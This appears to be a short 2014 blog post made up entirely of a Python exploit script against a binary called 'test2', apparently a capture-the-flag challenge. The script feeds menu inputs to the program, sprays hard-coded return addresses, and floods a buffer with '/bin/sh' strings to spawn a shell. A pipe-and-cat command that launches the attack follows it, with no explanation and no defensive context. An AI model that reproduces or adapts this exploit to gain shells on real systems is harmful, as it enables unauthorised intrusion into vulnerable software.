wakira 2014. 8. 22. 19:14


test2



import sys


payload = "\xc4\x87\x04\x08" * 300 + "\x30\x86\x04\x08" * 300


for i in range(3):

   sys.stdout.write("1\n")

   sys.stdout.write("author\n")

   sys.stdout.write("title\n")

   sys.stdout.write(payload + "\n")


sys.stdout.write("2\n")

sys.stdout.write("2\n")


for i in range(0x80):

   sys.stdout.write("3\n")

   sys.stdout.write("reply\n")


sys.stdout.write("1\n")

sys.stdout.write("4\n")


for i in range(2):

   sys.stdout.write("1\n")

   sys.stdout.write("author\n")

   sys.stdout.write("title\n")

   sys.stdout.write("content\n")


sys.stdout.write("2\n")

sys.stdout.write("4\n")


sys.stdout.write("2\n")

sys.stdout.write("author\n")

sys.stdout.write("title\n")


for i in range( 0x80):

   sys.stdout.write("3\n")

   sys.stdout.write("/bin/sh\n")


sys.stdout.write("1\n")


sys.stdout.write("4\n")

sys.stdout.write("3\n")


(python tt.py ; cat) ./test2